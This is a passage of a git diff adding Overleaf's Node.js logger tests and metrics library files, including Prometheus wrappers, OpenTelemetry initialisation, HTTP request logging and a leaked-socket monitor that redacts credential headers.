
SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/fetch-utils': this.FetchUtils, + fs: this.fs, + }, + }) + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('FileLogLevelChecker', function () { + beforeEach(function () { + this.logLevelChecker = new this.module.FileLogLevelChecker( + this.logger, + DEFAULT_LEVEL + ) + }) + + describe('when the file is empty', function () { + setupTracingEndTimeFile('') + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe("when the file can't be read", function () { + beforeEach(async function () { + this.fs.promises.readFile.rejects(new Error('Read error!')) + }) + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe('when the file has a timestamp in the future', function () { + setupTracingEndTimeFile(FUTURE.toString()) + checkLogLevel() + expectLevelSetTo(TRACE_LEVEL) + }) + + describe('when the file has a timestamp in the past', function () { + setupTracingEndTimeFile(PAST.toString()) + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe('interval checker', function () { + beforeEach(function () { + this.fs.promises.readFile.resolves('') + this.logLevelChecker.start() + }) + + afterEach(function () { + this.logLevelChecker.stop() + }) + + it('checks the file every minute', async function () { + this.clock.tick(1000) + // Yield to the event loop + await delay(0) + expect(this.logger.level).to.have.been.calledOnceWithExactly( + DEFAULT_LEVEL + ) + this.logger.level.reset() + + // Trace until 1.5 minutes in the future + const traceUntil = NOW + 90000 + this.fs.promises.readFile.resolves(traceUntil.toString()) + + this.clock.tick(61000) + await delay(0) + expect(this.logger.level).to.have.been.calledOnceWithExactly( + TRACE_LEVEL + ) + this.logger.level.reset() + + this.clock.tick(60000) + await delay(0) + expect(this.logger.level).to.have.been.calledOnceWithExactly( + DEFAULT_LEVEL + ) + }) + }) + }) + + describe('GCEMetadataLogLevelChecker', function () { + beforeEach(function () { + this.logLevelChecker = new this.module.GCEMetadataLogLevelChecker( + this.logger, + DEFAULT_LEVEL + ) + }) + + describe('when the response is empty', function () { + setupTracingEndTimeGCE('') + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe('when the request errors', function () { + beforeEach(async function () { + this.FetchUtils.fetchString.rejects(new Error('Read error!')) + }) + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe('when the response is a timestamp in the future', function () { + setupTracingEndTimeGCE(FUTURE.toString()) + checkLogLevel() + expectLevelSetTo(TRACE_LEVEL) + }) + + describe('when the response is a timestamp in the past', function () { + setupTracingEndTimeGCE(PAST.toString()) + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + }) +}) + +function setupTracingEndTimeFile(contents) { + beforeEach(`set tracing end time in file to ${contents}`, function () { + this.fs.promises.readFile.withArgs(TRACING_END_TIME_FILE).resolves(contents) + }) +} + +function setupTracingEndTimeGCE(contents) { + beforeEach( + `set tracing end time in GCE metadata to ${contents}`, + function () { + this.fetchLogLevelEndTimeStub.resolves(contents) + } + ) +} + +function checkLogLevel() { + beforeEach('Check log level', async function () { + await this.logLevelChecker.checkLogLevel() + }) +} + +function expectLevelSetTo(level) { + it(`sets the log level to ${level}`, function () { + expect(this.logger.level).to.have.been.calledWith(level) + 
}) +} diff --git a/libraries/logger/test/unit/logging-manager-tests.js b/libraries/logger/test/unit/logging-manager-tests.js new file mode 100644 index 0000000..9b571c3 --- /dev/null +++ b/libraries/logger/test/unit/logging-manager-tests.js @@ -0,0 +1,202 @@ +const SandboxedModule = require('sandboxed-module') +const bunyan = require('bunyan') +const { expect } = require('chai') +const path = require('node:path') +const sinon = require('sinon') + +const MODULE_PATH = path.join(__dirname, '../../logging-manager.js') + +describe('LoggingManager', function () { + beforeEach(function () { + this.start = Date.now() + this.bunyanLogger = { + addStream: sinon.stub(), + debug: sinon.stub(), + error: sinon.stub(), + fatal: sinon.stub(), + info: sinon.stub(), + level: sinon.stub(), + warn: sinon.stub(), + } + this.Bunyan = { + createLogger: sinon.stub().returns(this.bunyanLogger), + RingBuffer: bunyan.RingBuffer, + } + this.stackdriverStreamConfig = { stream: 'stackdriver' } + this.stackdriverClient = { + stream: sinon.stub().returns(this.stackdriverStreamConfig), + } + this.GCPLogging = { + LoggingBunyan: sinon.stub().returns(this.stackdriverClient), + } + this.FileLogLevelChecker = { + start: sinon.stub(), + stop: sinon.stub(), + } + this.GCEMetadataLogLevelChecker = { + start: sinon.stub(), + stop: sinon.stub(), + } + this.LogLevelChecker = { + FileLogLevelChecker: sinon.stub().returns(this.FileLogLevelChecker), + GCEMetadataLogLevelChecker: sinon + .stub() + .returns(this.GCEMetadataLogLevelChecker), + } + this.LoggingManager = SandboxedModule.require(MODULE_PATH, { + requires: { + bunyan: this.Bunyan, + './log-level-checker': this.LogLevelChecker, + }, + }) + this.loggerName = 'test' + this.logger = this.LoggingManager.initialize(this.loggerName) + }) + + afterEach(function () { + this.LoggingManager.removeWarningHandler() + }) + + describe('initialize', function () { + beforeEach(function () { + this.Bunyan.createLogger.reset() + }) + + describe('not in production', function () { + beforeEach(function () { + this.logger = this.LoggingManager.initialize(this.loggerName) + }) + + it('should default to log level debug', function () { + this.Bunyan.createLogger.firstCall.args[0].streams[0].level.should.equal( + 'debug' + ) + }) + + it('should not instantiate a log level checker', function () { + expect(this.LoggingManager.logLevelChecker).not.to.exist + }) + }) + + describe('in production', function () { + beforeEach(function () { + process.env.NODE_ENV = 'production' + this.logger = this.LoggingManager.initialize(this.loggerName) + }) + + afterEach(function () { + delete process.env.NODE_ENV + }) + + it('should default to log level info', function () { + this.Bunyan.createLogger.firstCall.args[0].streams[0].level.should.equal( + 'info' + ) + }) + + it('should set up a file log level checker', function () { + expect(this.logger.logLevelChecker).to.equal(this.FileLogLevelChecker) + expect(this.FileLogLevelChecker.start).to.have.been.called + }) + }) + + describe('when LOG_LEVEL set in env', function () { + beforeEach(function () { + process.env.LOG_LEVEL = 'trace' + this.LoggingManager.initialize() + }) + + afterEach(function () { + delete process.env.LOG_LEVEL + }) + + it('should use custom log level', function () { + this.Bunyan.createLogger.firstCall.args[0].streams[0].level.should.equal( + 'trace' + ) + }) + }) + }) + + describe('bunyan logging', function () { + beforeEach(function () { + this.logArgs = [{ foo: 'bar' }, 'foo', 'bar'] + }) + + it('should log debug', function () { + 
this.logger.debug(this.logArgs) + this.bunyanLogger.debug.should.have.been.calledWith(this.logArgs) + }) + + it('should log error', function () { + this.logger.error(this.logArgs) + this.bunyanLogger.error.should.have.been.calledWith(this.logArgs) + }) + + it('should log fatal', function () { + this.logger.fatal(this.logArgs) + this.bunyanLogger.fatal.should.have.been.calledWith(this.logArgs) + }) + + it('should log info', function () { + this.logger.info(this.logArgs) + this.bunyanLogger.info.should.have.been.calledWith(this.logArgs) + }) + + it('should log warn', function () { + this.logger.warn(this.logArgs) + this.bunyanLogger.warn.should.have.been.calledWith(this.logArgs) + }) + + it('should log err', function () { + this.logger.err(this.logArgs) + this.bunyanLogger.error.should.have.been.calledWith(this.logArgs) + }) + }) + + describe('ringbuffer', function () { + beforeEach(function () { + this.logBufferMock = [ + { msg: 'log 1' }, + { msg: 'log 2' }, + { level: 50, msg: 'error' }, + ] + }) + + describe('when ring buffer size is positive', function () { + beforeEach(function () { + process.env.LOG_RING_BUFFER_SIZE = '20' + this.logger = this.LoggingManager.initialize(this.loggerName) + this.logger.ringBuffer.records = this.logBufferMock + this.logger.error({}, 'error') + }) + + afterEach(function () { + process.env.LOG_RING_BUFFER_SIZE = undefined + }) + + it('should include buffered logs in error log and filter out error logs in buffer', function () { + this.bunyanLogger.error.lastCall.args[0].logBuffer.should.deep.equal([ + { msg: 'log 1' }, + { msg: 'log 2' }, + ]) + }) + }) + + describe('when ring buffer size is zero', function () { + beforeEach(function () { + process.env.LOG_RING_BUFFER_SIZE = '0' + this.logger = this.LoggingManager.initialize(this.loggerName) + this.logger.error({}, 'error') + }) + + afterEach(function () { + process.env.LOG_RING_BUFFER_SIZE = undefined + }) + + it('should not include buffered logs in error log', function () { + expect(this.bunyanLogger.error.lastCall.args[0].logBuffer).be.undefined + }) + }) + }) +}) diff --git a/libraries/logger/tsconfig.json b/libraries/logger/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/logger/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/metrics/.gitignore b/libraries/metrics/.gitignore new file mode 100644 index 0000000..2006c87 --- /dev/null +++ b/libraries/metrics/.gitignore @@ -0,0 +1,3 @@ +node_modules + +.npmrc diff --git a/libraries/metrics/.npmignore b/libraries/metrics/.npmignore new file mode 100644 index 0000000..879872f --- /dev/null +++ b/libraries/metrics/.npmignore @@ -0,0 +1,4 @@ +/.circleci +/.eslintrc +/.nvmrc +/.prettierrc diff --git a/libraries/metrics/.nvmrc b/libraries/metrics/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/metrics/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/metrics/CHANGELOG.md b/libraries/metrics/CHANGELOG.md new file mode 100644 index 0000000..30f24ea --- /dev/null +++ b/libraries/metrics/CHANGELOG.md @@ -0,0 +1,9 @@ +## v4.1.0 + +* Allows skipping the `sampleRate` argument. + +## v4.0.0 + +* Send unmodified request and response to logger. 
+ +This version of the metrics module only works with versions of the `@overleaf/logger` module greater than v3.0.0 diff --git a/libraries/metrics/LICENSE b/libraries/metrics/LICENSE new file mode 100644 index 0000000..54e6916 --- /dev/null +++ b/libraries/metrics/LICENSE @@ -0,0 +1,21 @@ +The MIT License (MIT) + +Copyright (c) 2024 Overleaf + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/libraries/metrics/README.md b/libraries/metrics/README.md new file mode 100644 index 0000000..faf9c53 --- /dev/null +++ b/libraries/metrics/README.md @@ -0,0 +1,33 @@ +# overleaf/metrics-module + +Wraps the [prom-client](https://github.com/siimon/prom-client) npm module to provide [Prometheus](https://prometheus.io/) metrics at `/metrics`. + +Use: + +``` +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const express = require('express') +const metrics = require('@overleaf/metrics') +const app = express() +metrics.injectMetricsRoute(app) +``` + +Request logging can be enabled: + +``` +const logger = require('@overleaf/logger') +... +app.use(metrics.http.monitor(logger)) +``` + +The metrics module can be configured through the following environment variables: + +- `DEBUG_METRICS` - enables display of debugging messages to the console.
+- `GCP_OPENTELEMETRY` - enables OpenTelemetry tracing for GCP +- `JAEGER_OPENTELEMETRY` - enables OpenTelemetry tracing for Jaeger (in the dev environment) +- `METRICS_APP_NAME` - the app label for metrics and spans +- `METRICS_COMPRESSION_LEVEL` - sets the [compression level](https://www.npmjs.com/package/compression#level) for `/metrics` +- `STACKDRIVER_LOGGING` - toggles the request logging format +- `UV_THREADPOOL_SIZE` - sets the libuv [thread pool](http://docs.libuv.org/en/v1.x/threadpool.html) size diff --git a/libraries/metrics/buildscript.txt b/libraries/metrics/buildscript.txt new file mode 100644 index 0000000..74fcbdb --- /dev/null +++ b/libraries/metrics/buildscript.txt @@ -0,0 +1,10 @@ +metrics +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/metrics/event_loop.js b/libraries/metrics/event_loop.js new file mode 100644 index 0000000..b255c4f --- /dev/null +++ b/libraries/metrics/event_loop.js @@ -0,0 +1,34 @@ +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +module.exports = { + monitor(logger, interval, logThreshold) { + if (interval == null) { + interval = 1000 + } + if (logThreshold == null) { + logThreshold = 100 + } + const Metrics = require('./index') + // check for logger on startup to avoid exceptions later if undefined + if (logger == null) { + throw new Error('logger is undefined') + } + // monitor delay in setInterval to detect event loop blocking + let previous = Date.now() + const intervalId = setInterval(function () { + const now = Date.now() + const offset = now - previous - interval + if (offset > logThreshold) { + logger.warn({ offset }, 'slow event loop') + } + previous = now + return Metrics.timing('event-loop-millsec', offset) + }, interval) + + return Metrics.registerDestructor(() => clearInterval(intervalId)) + }, +} diff --git a/libraries/metrics/http.js b/libraries/metrics/http.js new file mode 100644 index 0000000..4356852 --- /dev/null +++ b/libraries/metrics/http.js @@ -0,0 +1,78 @@ +const Metrics = require('./index') + +function monitor(logger, level = 'debug') { + return function (req, res, next) { + const startTime = Date.now() + req.logger = new RequestLogger(logger, level) + const { end } = res + res.end = function (...args) { + end.apply(this, args) + const responseTimeMs = Date.now() - startTime + const requestSize = parseInt(req.headers['content-length'], 10) + const routePath = getRoutePath(req) + + if (routePath != null) { + Metrics.timing('http_request', responseTimeMs, null, { + method: req.method, + status_code: res.statusCode, + path: routePath, + }) + if (requestSize) { + Metrics.summary('http_request_size_bytes', requestSize, { + method: req.method, + status_code: res.statusCode, + path: routePath, + }) + } + } + req.logger.addFields({ responseTimeMs }) + req.logger.emit(req, res) + } + next() + } +} + +function getRoutePath(req) { + if (req.route && req.route.path != null) { + return req.route.path + .toString() + .replace(/\//g, '_') + .replace(/:/g, '') + .slice(1) + } + if (req.swagger && req.swagger.apiPath != null) { + return req.swagger.apiPath + } + return null +} + +class RequestLogger { + constructor(logger, level) { + this._logger = logger + 
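+    // Fields accumulate in _info via addFields() and are emitted as a single
+    // log line when the response ends (see emit() below).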
this._level = level + this._info = {} + } + + addFields(fields) { + Object.assign(this._info, fields) + } + + setLevel(level) { + this._level = level + } + + disable() { + this._disabled = true + } + + emit(req, res) { + if (this._disabled) { + return + } + this.addFields({ req, res }) + const url = req.originalUrl || req.url + this._logger[this._level](this._info, '%s %s', req.method, url) + } +} + +module.exports.monitor = monitor diff --git a/libraries/metrics/index.js b/libraries/metrics/index.js new file mode 100644 index 0000000..257e863 --- /dev/null +++ b/libraries/metrics/index.js @@ -0,0 +1,182 @@ +/* eslint-disable no-console */ + +const ExpressCompression = require('compression') +const promClient = require('prom-client') +const promWrapper = require('./prom_wrapper') + +const destructors = [] + +require('./uv_threadpool_size') + +function registerDestructor(func) { + destructors.push(func) +} + +function injectMetricsRoute(app) { + app.get( + '/metrics', + ExpressCompression({ + level: parseInt(process.env.METRICS_COMPRESSION_LEVEL || '1', 10), + }), + function (req, res, next) { + res.set('Content-Type', promWrapper.registry.contentType) + promWrapper.registry + .metrics() + .then(metrics => { + res.end(metrics) + }) + .catch(err => { + next(err) + }) + } + ) +} + +function buildPromKey(key) { + return key.replace(/[^a-zA-Z0-9]/g, '_') +} + +function sanitizeValue(value) { + return parseFloat(value) +} + +function set(key, value, sampleRate = 1) { + console.log('counts are not currently supported') +} + +function inc(key, sampleRate = 1, labels = {}) { + if (arguments.length === 2 && typeof sampleRate === 'object') { + labels = sampleRate + } + + key = buildPromKey(key) + promWrapper.metric('counter', key, labels).inc(labels) + if (process.env.DEBUG_METRICS) { + console.log('doing inc', key, labels) + } +} + +function count(key, count, sampleRate = 1, labels = {}) { + if (arguments.length === 3 && typeof sampleRate === 'object') { + labels = sampleRate + } + + key = buildPromKey(key) + promWrapper.metric('counter', key, labels).inc(labels, count) + if (process.env.DEBUG_METRICS) { + console.log('doing count/inc', key, labels) + } +} + +function summary(key, value, labels = {}) { + key = buildPromKey(key) + promWrapper.metric('summary', key, labels).observe(labels, value) + if (process.env.DEBUG_METRICS) { + console.log('doing summary', key, value, labels) + } +} + +function timing(key, timeSpan, sampleRate = 1, labels = {}) { + if (arguments.length === 3 && typeof sampleRate === 'object') { + labels = sampleRate + } + + key = buildPromKey('timer_' + key) + promWrapper.metric('summary', key, labels).observe(labels, timeSpan) + if (process.env.DEBUG_METRICS) { + console.log('doing timing', key, labels) + } +} + +function histogram(key, value, buckets, labels = {}) { + key = buildPromKey('histogram_' + key) + promWrapper.metric('histogram', key, labels, buckets).observe(labels, value) + if (process.env.DEBUG_METRICS) { + console.log('doing histogram', key, buckets, labels) + } +} + +class Timer { + constructor(key, sampleRate = 1, labels = {}, buckets = undefined) { + if (typeof sampleRate === 'object') { + // called with (key, labels, buckets) + if (arguments.length === 3) { + buckets = labels + labels = sampleRate + } + + // called with (key, labels) + if (arguments.length === 2) { + labels = sampleRate + } + + sampleRate = 1 // default value to pass to timing function + } + + this.start = new Date() + key = buildPromKey(key) + this.key = key + this.sampleRate = sampleRate + 
this.labels = labels + this.buckets = buckets + } + + // any labels passed into the done method override labels from constructor + done(labels = {}) { + const timeSpan = new Date() - this.start + if (this.buckets) { + histogram(this.key, timeSpan, this.buckets, { ...this.labels, ...labels }) + } else { + timing(this.key, timeSpan, this.sampleRate, { ...this.labels, ...labels }) + } + return timeSpan + } +} + +function gauge(key, value, sampleRate = 1, labels = {}) { + if (arguments.length === 3 && typeof sampleRate === 'object') { + labels = sampleRate + } + + key = buildPromKey(key) + promWrapper.metric('gauge', key, labels).set(labels, sanitizeValue(value)) + if (process.env.DEBUG_METRICS) { + console.log('doing gauge', key, labels) + } +} + +function globalGauge(key, value, sampleRate = 1, labels = {}) { + key = buildPromKey(key) + labels = { host: 'global', ...labels } + promWrapper.metric('gauge', key, labels).set(labels, sanitizeValue(value)) +} + +function close() { + for (const func of destructors) { + func() + } +} + +module.exports.registerDestructor = registerDestructor +module.exports.injectMetricsRoute = injectMetricsRoute +module.exports.buildPromKey = buildPromKey +module.exports.sanitizeValue = sanitizeValue +module.exports.set = set +module.exports.inc = inc +module.exports.count = count +module.exports.summary = summary +module.exports.timing = timing +module.exports.histogram = histogram +module.exports.Timer = Timer +module.exports.gauge = gauge +module.exports.globalGauge = globalGauge +module.exports.close = close +module.exports.prom = promClient +module.exports.register = promWrapper.registry + +module.exports.http = require('./http') +module.exports.open_sockets = require('./open_sockets') +module.exports.leaked_sockets = require('./leaked_sockets') +module.exports.event_loop = require('./event_loop') +module.exports.memory = require('./memory') +module.exports.mongodb = require('./mongodb') diff --git a/libraries/metrics/initialize.js b/libraries/metrics/initialize.js new file mode 100644 index 0000000..1028ee0 --- /dev/null +++ b/libraries/metrics/initialize.js @@ -0,0 +1,105 @@ +/* eslint-disable no-console */ + +/** + * This module initializes the metrics module. It should be imported once + * before any other module to support code instrumentation. 
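+ * (Annotation: the OpenTelemetry auto-instrumentations patch modules such as
+ * `http` as they are required, so anything loaded before this module would
+ * escape tracing.)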
+ */ + +const APP_NAME = process.env.METRICS_APP_NAME || 'unknown' +const BUILD_VERSION = process.env.BUILD_VERSION +const ENABLE_PROFILE_AGENT = process.env.ENABLE_PROFILE_AGENT === 'true' +const GCP_OPENTELEMETRY = process.env.GCP_OPENTELEMETRY === 'true' +const JAEGER_OPENTELEMETRY = process.env.JAEGER_OPENTELEMETRY === 'true' + +console.log('Initializing metrics') + +if (GCP_OPENTELEMETRY || JAEGER_OPENTELEMETRY) { + initializeOpenTelemetryInstrumentation() + initializeOpenTelemetryLogging() +} + +if (ENABLE_PROFILE_AGENT) { + initializeProfileAgent() +} + +initializePrometheus() +initializePromWrapper() +recordProcessStart() + +function initializeOpenTelemetryInstrumentation() { + console.log('Starting OpenTelemetry instrumentation') + const opentelemetry = require('@opentelemetry/sdk-node') + const { + getNodeAutoInstrumentations, + } = require('@opentelemetry/auto-instrumentations-node') + const { Resource } = require('@opentelemetry/resources') + const { + SemanticResourceAttributes, + } = require('@opentelemetry/semantic-conventions') + + const resource = new Resource({ + [SemanticResourceAttributes.SERVICE_NAME]: APP_NAME, + [SemanticResourceAttributes.SERVICE_NAMESPACE]: 'Overleaf', + 'host.type': 'VM', + }) + + let exporter + if (GCP_OPENTELEMETRY) { + const GCP = require('@google-cloud/opentelemetry-cloud-trace-exporter') + exporter = new GCP.TraceExporter() + } else if (JAEGER_OPENTELEMETRY) { + const { + OTLPTraceExporter, + } = require('@opentelemetry/exporter-trace-otlp-http') + exporter = new OTLPTraceExporter({ + url: `http://${process.env.JAEGER_HOST || 'jaeger'}:4318/v1/traces`, + }) + } else { + return + } + + const sdk = new opentelemetry.NodeSDK({ + traceExporter: exporter, + logger: console, + instrumentations: [getNodeAutoInstrumentations()], + resource, + }) + sdk.start() +} + +function initializeOpenTelemetryLogging() { + const { + diag, + DiagConsoleLogger, + DiagLogLevel, + } = require('@opentelemetry/api') + diag.setLogger(new DiagConsoleLogger(), DiagLogLevel.INFO) +} + +function initializeProfileAgent() { + console.log('Starting Google Profile Agent') + const profiler = require('@google-cloud/profiler') + profiler.start({ + serviceContext: { + service: APP_NAME, + version: BUILD_VERSION, + }, + }) +} + +function initializePrometheus() { + const os = require('node:os') + const promClient = require('prom-client') + promClient.register.setDefaultLabels({ app: APP_NAME, host: os.hostname() }) + promClient.collectDefaultMetrics({ timeout: 5000, prefix: '' }) +} + +function initializePromWrapper() { + const promWrapper = require('./prom_wrapper') + promWrapper.setupSweeping() +} + +function recordProcessStart() { + const metrics = require('.') + metrics.inc('process_startup') +} diff --git a/libraries/metrics/leaked_sockets.js b/libraries/metrics/leaked_sockets.js new file mode 100644 index 0000000..d250fc4 --- /dev/null +++ b/libraries/metrics/leaked_sockets.js @@ -0,0 +1,254 @@ +/** + * This file monitors HTTP connections in Node.js and logs any potential socket leaks. + * It uses the `diagnostics_channel` module to intercept requests and responses in the + * `http` module and tracks the lifetime of each http socket. If a socket is open for + * longer than a specified time, it is considered a potential leak and its details are + * logged along with the corresponding information from /proc/net/tcp.
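+ * (Annotation: a leaked socket is re-logged on an exponential backoff, so its
+ * repeated entries show how long the handle has survived; see isOldSocket
+ * below.)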
+ */ + +const fs = require('node:fs') +const diagnosticsChannel = require('node:diagnostics_channel') + +const SOCKET_MONITOR_INTERVAL = 60 * 1000 +// set the threshold for logging leaked sockets in minutes, defaults to 15 +const MIN_SOCKET_LEAK_TIME = + (parseInt(process.env.LEAKED_SOCKET_AGE_THRESHOLD, 10) || 15) * 60 * 1000 + +// Record HTTP events using diagnostics_channel +diagnosticsChannel.subscribe('http.client.request.start', handleRequest) +diagnosticsChannel.subscribe('http.server.request.start', handleRequest) +diagnosticsChannel.subscribe('http.client.response.finish', handleResponse) +diagnosticsChannel.subscribe('http.server.response.finish', handleResponse) + +function handleRequest({ request: req }) { + const socket = req?.socket + if (socket) { + recordRequest(req, socket) + } +} + +function recordRequest(req, socket) { + const { method, protocol, path, url, rawHeaders, _header } = req + socket._ol_debug = { + method, + protocol, + url: url ?? path, + request: { headers: rawHeaders ?? _header, ts: new Date() }, + } +} + +function handleResponse({ request: req, response: res }) { + const socket = req?.socket || res?.socket + if (!socket || !res) { + return + } + if (!socket._ol_debug) { + // I don't know if this will ever happen, but if we missed the request, + // record it here. + recordRequest(req, socket) + } + const { statusCode, statusMessage, headers, _header } = res + Object.assign(socket._ol_debug, { + response: { + statusCode, + statusMessage, + headers: headers ?? _header, + ts: new Date(), + }, + }) +} + +// Additional functions to log request headers with sensitive information redacted + +function flattenHeaders(rawHeaders) { + // Headers can be an array [KEY, VALUE, KEY, VALUE, ..] + // an object {key:value, key:value, ...} + // or a string of the headers separated by \r\n + // Flatten the array and object headers into the string form. + if (Array.isArray(rawHeaders)) { + return rawHeaders + .map((item, index) => (index % 2 === 0 ? `${item}: ` : `${item}\r\n`)) + .join('') + } else if (typeof rawHeaders === 'object') { + return Object.entries(rawHeaders) + .map(([key, value]) => `${key}: ${value}\r\n`) + .join('') + } else if (typeof rawHeaders === 'string') { + return rawHeaders + } else { + return JSON.stringify(rawHeaders) + } +} + +const REDACT_REGEX = /^(Authorization|Set-Cookie|Cookie):.*?\r/gim + +function redactObject(obj) { + const result = {} + for (const [key, value] of Object.entries(obj)) { + if (value == null) { + result[key] = null + } else if (key === 'headers') { + // remove headers with sensitive information + result[key] = flattenHeaders(value).replace( + REDACT_REGEX, + `$1: REDACTED\r` + ) + } else if ( + typeof value === 'object' && + ['request', 'response'].includes(key) + ) { + result[key] = redactObject(value) + } else { + result[key] = value + } + } + return result +} + +// Check if an old socket has crossed the threshold for logging. +// We log multiple times with an exponential backoff so we can +// see how long a socket hangs around. + +function isOldSocket(handle) { + const now = new Date() + const created = handle._ol_debug.request.ts + const lastLoggedAt = handle._ol_debug.lastLoggedAt ?? 
created + const nextLogTime = new Date( + created.getTime() + + Math.max(2 * (lastLoggedAt - created), MIN_SOCKET_LEAK_TIME) + ) + return now >= nextLogTime +} + +function logOldSocket(logger, handle, tcpinfo) { + const now = new Date() + const info = Object.assign( + { + localAddress: handle.localAddress, + localPort: handle.localPort, + remoteAddress: handle.remoteAddress, + remotePort: handle.remotePort, + tcpinfo, + age: Math.floor((now - handle._ol_debug.request.ts) / (60 * 1000)), // age in minutes + }, + redactObject(handle._ol_debug) + ) + handle._ol_debug.lastLoggedAt = now + if (tcpinfo) { + logger.error(info, 'old socket handle - tcp socket') + } else { + logger.warn(info, 'stale socket handle - no entry in /proc/net/tcp') + } +} + +// Correlate socket handles with /proc/net/tcp entries using a key based on the +// local and remote addresses and ports. This will allow us to distinguish between +// sockets that are still open and sockets that have been closed and removed from +// the /proc/net/tcp table but are still present in the node active handles array. + +async function getOpenSockets() { + // get open sockets remote and local address:port from /proc/net/tcp + const procNetTcp = '/proc/net/tcp' + const openSockets = new Map() + const lines = await fs.promises.readFile(procNetTcp, 'utf8') + for (const line of lines.split('\n')) { + const socket = parseProcNetTcp(line) + if (socket) { + openSockets.set(socket, line) + } + } + return openSockets +} + +function keyFromSocket(socket) { + return `${socket.localAddress}:${socket.localPort} -> ${socket.remoteAddress}:${socket.remotePort}` +} + +function decodeHexIpAddress(hex) { + // decode hex ip address to dotted decimal notation + const ip = parseInt(hex, 16) + const a = ip & 0xff + const b = (ip >> 8) & 0xff + const c = (ip >> 16) & 0xff + const d = (ip >> 24) & 0xff + return `${a}.${b}.${c}.${d}` +} + +function decodeHexPort(hex) { + // decode hex port to decimal + return parseInt(hex, 16) +} + +// Regex for extracting the local and remote addresses and ports from the /proc/net/tcp output +// Example line: +// 16: AB02A8C0:D9E2 86941864:01BB 01 00000000:00000000 02:000004BE 00000000 0 0 36802 2 0000000000000000 28 4 26 10 -1 +// ^^^^^^^^^^^^^ ^^^^^^^^^^^^^ +// local remote + +const TCP_STATE_REGEX = + /^\s*\d+:\s+(?<localHexAddress>[0-9A-F]{8}):(?<localHexPort>[0-9A-F]{4})\s+(?<remoteHexAddress>[0-9A-F]{8}):(?<remoteHexPort>[0-9A-F]{4})/i + +function parseProcNetTcp(line) { + const match = line.match(TCP_STATE_REGEX) + if (match) { + const { localHexAddress, localHexPort, remoteHexAddress, remoteHexPort } = + match.groups + return keyFromSocket({ + localAddress: decodeHexIpAddress(localHexAddress), + localPort: decodeHexPort(localHexPort), + remoteAddress: decodeHexIpAddress(remoteHexAddress), + remotePort: decodeHexPort(remoteHexPort), + }) + } +} + +let LeakedSocketsMonitor + +// Export the monitor and scanSockets functions + +module.exports = LeakedSocketsMonitor = { + monitor(logger) { + const interval = setInterval( + () => LeakedSocketsMonitor.scanSockets(logger), + SOCKET_MONITOR_INTERVAL + ) + const Metrics = require('./index') + return Metrics.registerDestructor(() => clearInterval(interval)) + }, + scanSockets(logger) { + const debugSockets = process._getActiveHandles().filter(handle => { + return handle._ol_debug + }) + + // Bail out if there are no sockets with the _ol_debug property + if (debugSockets.length === 0) { + return + } + + const oldSockets = debugSockets.filter(isOldSocket) + + // Bail out if there are no old sockets to log + if (oldSockets.length === 0) { + return
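+      // Annotation: returning early here avoids reading /proc/net/tcp when
+      // there is nothing old enough to report.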
+ } + + // If there old sockets to log, get the connections from /proc/net/tcp + // to distinguish between sockets that are still open and sockets that + // have been closed and removed from the /proc/net/tcp table. + getOpenSockets() + .then(openSockets => { + oldSockets.forEach(handle => { + try { + const key = keyFromSocket(handle) + const tcpinfo = openSockets.get(key) + logOldSocket(logger, handle, tcpinfo) + } catch (err) { + logger.error({ err }, 'error in scanSockets') + } + }) + }) + .catch(err => { + logger.error({ err }, 'error getting open sockets') + }) + }, +} diff --git a/libraries/metrics/memory.js b/libraries/metrics/memory.js new file mode 100644 index 0000000..73dc18c --- /dev/null +++ b/libraries/metrics/memory.js @@ -0,0 +1,113 @@ +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// record memory usage each minute and run a periodic gc(), keeping cpu +// usage within allowable range of 1ms per minute. Also, dynamically +// adjust the period between gc()'s to reach a target of the gc saving +// 4 megabytes each time. + +let MemoryMonitor +const oneMinute = 60 * 1000 +const oneMegaByte = 1024 * 1024 + +let CpuTimeBucket = 100 // current cpu time allowance in milliseconds +const CpuTimeBucketMax = 100 // maximum amount of cpu time allowed in bucket +const CpuTimeBucketRate = 10 // add this many milliseconds per minute + +let gcInterval = 1 // how many minutes between gc (parameter is dynamically 